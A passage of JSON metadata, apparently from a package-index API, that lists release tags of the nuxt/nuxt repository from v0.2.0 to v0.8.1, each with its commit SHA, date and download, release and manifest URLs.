14ddf83c19efed","kind":"commit","published_at":"2016-12-07T22:44:34.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.8.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.1/manifests"},{"name":"v0.8.0","sha":"be5e8c118d1415e33031772daca422a0fae511bf","kind":"commit","published_at":"2016-12-07T18:43:22.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.8.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.0/manifests"},{"name":"v0.7.9","sha":"8801327db20c2e5daa594a7d8ad95d7a2a582a14","kind":"commit","published_at":"2016-12-04T18:16:48.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.7.9","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.7.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.7.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.9/manifests"},{"name":"v0.7.8","sha":"ddbffcc8af4393e14cc44daa94b4a27a21c6fadf","kind":"commit","published_at":"2016-12-01T18:09:40.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.7.8","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.7.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.7.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.8/manifests"},{"name":"v0.7.7","sha":"fdc430b23bac4a0cf86b0bc0da7828a573a0176d","kind":"commit","published_at":"2016-11-28T16:28:59.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.7.7","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.7.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.7.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.7/manifests"},{"name":"v0.7.6","sha":"53499f2a6b0ebf7514f984f6d81ce76ab9aaeb09","kind":"commit","published_at":"2016-11-27T17:46:05.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.7.6","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.7.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.7.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.6/manifests"},{"name":"v0.7.5","sha":"3ed1340d568c36f65bfe66618f9ac8119e8408de","kind":"commit","published_at":"2016-11-27T17:13:01.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.7.5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.7.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.7.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.5/manifests"},{"name":"v0.7.4","sha":"bcf291b54761b64c271573e045e9275f189c3bea","kind":"commit","published_at":"2016-11-25T16:58:23.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.7.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.7.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.7.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.4/manifests"},{"name":"v0.7.3","sha":"cb1994319cd920b77181d852daf79a9c2c51b25c","kind":"commit","published_at":"2016-11-25T14:37:21.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.7.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.7.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.7.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.3/manifests"},{"name":"v0.7.2","sha":"4b9fb87c860f69d4b5044533aee0c16310b10aa1","kind":"commit","published_at":"2016-11-24T13:41:38.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.7.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.7.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.7.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.2/manifests"},{"name":"v0.7.1","sha":"d984c8803d9dd1e58c56a08b97f7d38ba5cb92b7","kind":"commit","published_at":"2016-11-24T12:16:48.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.7.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.7.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.1/manifests"},{"name":"v0.7.0","sha":"40515ac91a9e4ae5fd7b4a37c75de2843f6d3fbc","kind":"commit","published_at":"2016-11-24T00:47:11.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.7.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.0/manifests"},{"name":"v0.6.9","sha":"5b35834f42aa6cea3724f098787587a86ec6f4c3","kind":"commit","published_at":"2016-11-23T13:05:22.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.6.9","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.6.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.6.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.6.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.6.9/manifests"},{"name":"v0.6.8","sha":"57b55dc5126ae271f3b87b2d3ffdac49055e355e","kind":"commit","published_at":"2016-11-22T23:47:31.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.6.8","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.6.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.6.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.6.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.6.8/manifests"},{"name":"v0.6.7","sha":"57b55dc5126ae271f3b87b2d3ffdac49055e355e","kind":"commit","published_at":"2016-11-22T23:47:31.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.6.7","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.6.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.6.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.6.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.6.7/manifests"},{"name":"v0.6.6","sha":"fc598ea66e1249645ed3677d8725efc1c048ba2d","kind":"commit","published_at":"2016-11-22T23:27:07.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.6.6","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.6.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.6.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.6.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.6.6/manifests"},{"name":"v0.6.5","sha":"2400fabceb3b76b756efc8ede2919a4ccb088345","kind":"commit","published_at":"2016-11-21T18:53:11.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.6.5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.6.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.6.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.6.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.6.5/manifests"},{"name":"v0.6.0","sha":"edd0227e746c2ecde781915bd8c59e98f399439a","kind":"commit","published_at":"2016-11-21T13:15:08.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.6.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.6.0/manifests"},{"name":"v0.5.3","sha":"b8436b067f8375bb91e4b99cc528661eaa27c43c","kind":"commit","published_at":"2016-11-20T11:23:48.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.5.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.5.3/manifests"},{"name":"v0.5.2","sha":"b8436b067f8375bb91e4b99cc528661eaa27c43c","kind":"commit","published_at":"2016-11-20T11:23:48.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.5.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.5.2/manifests"},{"name":"v0.5.1","sha":"8cbbaeaf838e33bb6e23f06e15724b39042c5206","kind":"commit","published_at":"2016-11-20T10:37:53.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.5.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.5.1/manifests"},{"name":"v0.5.0","sha":"e48f8250a084202fbc492df55f13e3803e2b74cf","kind":"commit","published_at":"2016-11-18T13:45:25.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.5.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.5.0/manifests"},{"name":"v0.4.9","sha":"d4b8bc4f022459c976b41cb9845be38759a0481a","kind":"commit","published_at":"2016-11-18T09:38:57.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.4.9","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.4.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.4.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.9/manifests"},{"name":"v0.4.8","sha":"d928c9e5970e9d08eec61fe6770325d8c74e6d5b","kind":"commit","published_at":"2016-11-18T08:19:06.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.4.8","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.4.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.4.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.8/manifests"},{"name":"v0.4.7","sha":"49f67566c2d74a661421be1589279b316dcc9e49","kind":"commit","published_at":"2016-11-17T21:12:21.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.4.7","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.4.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.4.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.7/manifests"},{"name":"v0.4.6","sha":"06edc8029b796b8008fe52a682159636d10f3e7a","kind":"commit","published_at":"2016-11-17T13:02:09.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.4.6","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.4.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.4.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.6/manifests"},{"name":"v0.4.4","sha":"2677afb46fc4a950d62f32e6172aeaa2fdcc5a8b","kind":"commit","published_at":"2016-11-17T10:57:12.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.4.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.4.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.4.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.4/manifests"},{"name":"v0.4.3","sha":"a98e6d4e9bda0491bf8f32815701f42f28c793a2","kind":"commit","published_at":"2016-11-16T17:41:09.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.4.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.4.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.3/manifests"},{"name":"v0.4.2","sha":"d2c0f01593e669147396ff25c4a017372a8390ea","kind":"commit","published_at":"2016-11-16T17:06:54.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.4.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.4.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.2/manifests"},{"name":"v0.4.1","sha":"b1546682ef7ce3f9ead26f328417d2589875ef46","kind":"commit","published_at":"2016-11-16T16:55:26.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.4.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.1/manifests"},{"name":"v0.4.0","sha":"c5c9448a264327adab3920d07937f819f5c0a3c4","kind":"commit","published_at":"2016-11-11T14:30:11.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.4.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.0/manifests"},{"name":"v0.3.8","sha":"4b0b83b782ba2c865722dbd80521ca6aa1d63b4a","kind":"commit","published_at":"2016-11-11T00:35:05.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.3.8","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.3.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.3.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.8/manifests"},{"name":"v0.3.7","sha":"4b0b83b782ba2c865722dbd80521ca6aa1d63b4a","kind":"commit","published_at":"2016-11-11T00:35:05.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.3.7","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.3.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.3.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.7/manifests"},{"name":"v0.3.6","sha":"5b0ff5617b97d050983358879b6a70835d63be8a","kind":"commit","published_at":"2016-11-10T23:01:36.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.3.6","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.3.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.3.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.6/manifests"},{"name":"v0.3.5","sha":"cb7406cba6a42a4009660569c921f7fdca5bb209","kind":"commit","published_at":"2016-11-10T18:34:59.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.3.5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.3.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.3.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.5/manifests"},{"name":"v0.3.4","sha":"ea1c5dee15ed92add7e8f69bd523cb090161194e","kind":"commit","published_at":"2016-11-10T16:16:37.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.3.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.3.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.4/manifests"},{"name":"v0.3.3","sha":"9f370cb97c98ff40d4ed5c871147f3c441883b7f","kind":"commit","published_at":"2016-11-10T14:09:10.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.3.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.3/manifests"},{"name":"v0.3.2","sha":"a8776de913a391bfd825b56cbd5ae655d3490240","kind":"commit","published_at":"2016-11-10T13:46:16.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.3.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.2/manifests"},{"name":"v0.3.1","sha":"c97c4ec32e0b5a889bd3b95f5f18d251db202354","kind":"commit","published_at":"2016-11-10T02:38:11.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.3.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.1/manifests"},{"name":"v0.3.0","sha":"d88948bdeac9cd3b8c8f1c1456198e666e49664e","kind":"commit","published_at":"2016-11-10T01:19:47.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.3.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.0/manifests"},{"name":"v0.2.6","sha":"18a2b57655a6be21a93949520a663825471fbd48","kind":"commit","published_at":"2016-11-09T22:59:41.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.2.6","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.2.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.2.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.6/manifests"},{"name":"v0.2.5","sha":"a5780a09cae0a0109103bf660da96e479ec5ef73","kind":"commit","published_at":"2016-11-09T14:55:02.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.2.5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.2.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.2.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.5/manifests"},{"name":"v0.2.4","sha":"73bdfc03943799025def2b91f2402208126da453","kind":"commit","published_at":"2016-11-09T01:35:13.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.2.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.2.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.2.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.4/manifests"},{"name":"v0.2.3","sha":"90a97d76ce938be645f82f538a268a83b4c9630d","kind":"commit","published_at":"2016-11-08T02:48:18.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.2.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.3/manifests"},{"name":"v0.2.2","sha":"923b211a929392e7bb77e3e9326655229397ca13","kind":"commit","published_at":"2016-11-08T00:54:53.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.2.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.2/manifests"},{"name":"v0.2.1","sha":"876054ed48764ef11278c27d1884d94c3153b05d","kind":"commit","published_at":"2016-11-08T00:18:26.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.2.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.1/manifests"},{"name":"v0.2.0","sha":"9ebbb14eabd73ed64871d0ee59fafaad914e95f2","kind":"commit","published_at":"2016-11-07T22:26:53.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.2.0","html_url":"https://github.com/nuxt/nuxt/releases/